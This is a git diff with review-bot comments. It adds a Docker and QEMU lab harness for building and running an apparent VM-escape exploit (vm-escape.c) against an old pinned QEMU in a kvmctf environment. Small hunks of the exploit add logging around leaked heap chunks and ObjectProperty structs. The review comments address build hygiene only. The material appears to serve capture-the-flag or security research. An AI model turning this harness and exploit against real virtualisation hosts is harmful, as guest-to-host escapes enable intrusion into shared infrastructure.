diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..92c6c0a
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,4 @@
+newinitrd.img
+./extracted/**/**
+ramdisk.img
+/extracted/
diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..bd8880f
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "qemu"]
+ path = qemu
+ url = https://github.com/qemu/qemu.git
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..36166f7
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,33 @@
+FROM ubuntu:18.04
+RUN apt-get update && apt-get install git -y
+RUN git clone https://github.com/qemu/qemu.git
+WORKDIR qemu
+RUN git checkout bd80b59
+RUN DEBIAN_FRONTEND=noninteractive apt-get install python gcc bison flex make libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev ninja-build -y
+RUN mkdir -p bin/debug/native && \
+ cd bin/debug/native && \
+ ../../../configure --target-list=x86_64-softmmu --enable-debug \
+ --disable-werror
+RUN cd bin/debug/native && make && make install
+RUN DEBIAN_FRONTEND=noninteractive apt-get install cpio initramfs-tools-core -y
+# (mkinitramfs -o initrd || true) && \
+RUN mkdir -p /qemu/tmp/tmp/extracted/
+COPY extracted /qemu/tmp/tmp/extracted
+#unmkinitramfs initrd ./extracted && \
+RUN cd /qemu/tmp/tmp && \
+ cd extracted && \
+ cd early && \
+ find . -print0 | cpio --null --create --format=newc > /qemu/tmp/tmp/newinitrd && \
+ cd ../early2 && \
+ find kernel -print0 | cpio --null --create --format=newc >> /qemu/tmp/tmp/newinitrd
+ COPY run_vm_escape.sh ./
+RUN apt-get install wget -y
+RUN wget https://storage.googleapis.com/kvmctf/latest.tar.gz
+RUN tar xzf latest.tar.gz
+RUN cp kvmctf-6.1.74/bzImage/bzImage ./ && mkdir /vm-escape
+COPY ./vm-escape.c ./Makefile /vm-escape
+RUN make -C /vm-escape/ && cp /vm-escape/vm-escape /qemu/tmp/tmp/extracted/main/bin
+RUN cd /qemu/tmp/tmp/extracted/main && \
+ find . | cpio --create --format=newc | xz --format=lzma >> /qemu/tmp/tmp/newinitrd
+
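Review bot: The second pattern, `./extracted/**/**`, is redundant with `/extracted/` on the last line, and as far as I know git does not strip a leading `./` from an ignore pattern, so it matches nothing on its own; dropping it leaves `/extracted/` to cover the tree. `newinitrd.img` on the first line also does not name the `newinitrd` file the Dockerfile in this commit writes, though that file is produced inside the image rather than the checkout, so it may be a leftover from an earlier layout.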
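Review bot: `RUN wget https://storage.googleapis.com/kvmctf/latest.tar.gz` pulls an unversioned archive with no integrity check, and the following `cp kvmctf-6.1.74/bzImage/bzImage ./` hard-codes a path inside it, so the image silently changes and then breaks whenever `latest` is republished. Pin what is fetched and verify it before `tar xzf`, e.g. `RUN wget ... && echo "<EXPECTED_SHA256>  latest.tar.gz" | sha256sum -c -` with the digest recorded once (placeholder shown), or fetch a versioned archive if the bucket provides one. The `git clone https://github.com/qemu/qemu.git` at the top has the same reproducibility gap even though this commit already pins qemu at `bd80b59` through the submodule; copying the checked-out submodule tree into the image instead of cloning keeps the build tied to that revision and avoids a full network clone. `ubuntu:18.04` is past end of standard support, so the unpinned `apt-get install` lines will eventually stop resolving; worth a comment at minimum. The final `find . | cpio --create` also drops the `-print0`/`--null` pair the two earlier cpio calls use, so a path with whitespace under `extracted/main` would be archived incorrectly.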
diff --git a/Makefile b/Makefile
index 841ea2e..7f6fd38 100644
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,4 @@
+LDFLAGS= -pthread -lpthread
 CFLAGS=-g -lpthread -std=c11 -D_DEFAULT_SOURCE
 
 all: vm-escape
diff --git a/init.sh b/init.sh
new file mode 100755
index 0000000..3f72318
--- /dev/null
+++ b/init.sh
@@ -0,0 +1,9 @@
+#mkinitramfs, extract ramdisk.img
+mkinitramfs -o ramdisk.img
+unmkinitramfs ramdisk.img ./extracted
+
+#build everything
+docker build . -t vm_escape
+
+#run docker run_vm_escape
+docker run --device=/dev/kvm -ti vm_escape ./run_vm_escape.sh
diff --git a/qemu b/qemu
new file mode 160000
index 0000000..bd80b59
--- /dev/null
+++ b/qemu
@@ -0,0 +1 @@
+Subproject commit bd80b5963f58c601f31d3186b89887bf8e182fb5
diff --git a/run_vm_escape.sh b/run_vm_escape.sh
new file mode 100755
index 0000000..d73f503
--- /dev/null
+++ b/run_vm_escape.sh
@@ -0,0 +1,8 @@
+qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \
+ -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
+ -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
+ -L ./qemu/pc-bios \
+ -nographic \
+ -append "console=ttyS0 nokaslr" \
+ -initrd /qemu/tmp/tmp/newinitrd \
+ -boot c -kernel ./bzImage
diff --git a/vm-escape.c b/vm-escape.c
index 68a273d..44e436c 100644
--- a/vm-escape.c
+++ b/vm-escape.c
@@ -725,6 +725,10 @@ size_t qemu_get_leaked_chunk(struct rtl8139_ring *ring, size_t nb_packet,
 }
 }
 }
+ if (!nb_leak) {
+ warnx("[!] searched %lu packets with %lu size, %"PRIxHPTR", no chunk found",
+ nb_packet, size, (long unsigned) leak);
+ }
 return nb_leak;
 }
 
@@ -1015,7 +1019,7 @@ int main()
 if (!nb_leak) {
 errx(-1, "[!] failed to find usable chunks");
 }
- warnx("[+] found %d potential ObjectProperty structs in memory", nb_leak);
+ warnx("[+] found %lu potential ObjectProperty structs in memory", nb_leak);
 score = qemu_get_leaked_object_property(leak, nb_leak, &leak_object,
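Review bot: `LDFLAGS= -pthread -lpthread` duplicates what `-pthread` already does (gcc adds `-lpthread` at link time itself), and `-lpthread` also stays in `CFLAGS` on the next line, where it is a linker option the compile step ignores. If the `vm-escape` target relies on make's implicit link rule (its recipe is outside this hunk), `$(LDFLAGS)` is placed before the object files, where a `-l` option may not resolve anything under `--as-needed`; libraries belong in `LDLIBS`, not `LDFLAGS`. A minimal, consistent form would be `CFLAGS=-g -pthread -std=c11 -D_DEFAULT_SOURCE` and `LDFLAGS=-pthread`.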
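Review bot: init.sh is added with mode 100755 but has no shebang, so its first line is the comment `#mkinitramfs, extract ramdisk.img`; a direct `./init.sh` then depends on the calling shell's ENOEXEC fallback rather than a declared interpreter, and run_vm_escape.sh in this same commit has the same gap. Add `#!/bin/sh` (or `#!/bin/bash`, if bash features are relied on) as line 1 of both. Here it is also worth following it with `set -eu`, since a failed `mkinitramfs` or `unmkinitramfs` currently still proceeds to `docker build` with whatever happens to be in `./extracted`.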
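Review bot: `-display vnc=:89` on the first line starts an unauthenticated VNC server on display :89 (TCP 5989) bound to all interfaces inside the container, while `-nographic` further down already routes the guest console to stdio, so the VNC display is most likely unused. Either drop it or bind it to loopback, `-display vnc=127.0.0.1:89`; the `docker run` in init.sh publishes no ports, so exposure is limited to the container's network namespace, but a loopback bind costs nothing. The trailing commas in `-netdev user,id=t0,` and `-netdev user,id=t1,` look accidental, though QEMU presumably tolerates them given the script has been run.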
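Review bot: The added `warnx` prints `nb_packet` with `%lu`, but the hunk header shows it declared as `size_t`; `%zu` is the matching conversion, and `%lu` only agrees with it on platforms where `unsigned long` and `size_t` coincide. The second hunk (`int main`, around line 1022) swaps the old `%d` for the same `%lu` on `nb_leak`, which is likely `size_t` as well since this function returns `size_t` and `nb_leak` is what it returns, though both that declaration and the type of `size` are outside the hunk, so `%zu` for those two should be confirmed against the declarations. Suggested for the first format: `warnx("[!] searched %zu packets with %lu size, %"PRIxHPTR", no chunk found",` with `size` changed likewise if it is a `size_t`. The body of qemu_get_leaked_chunk begins before this hunk.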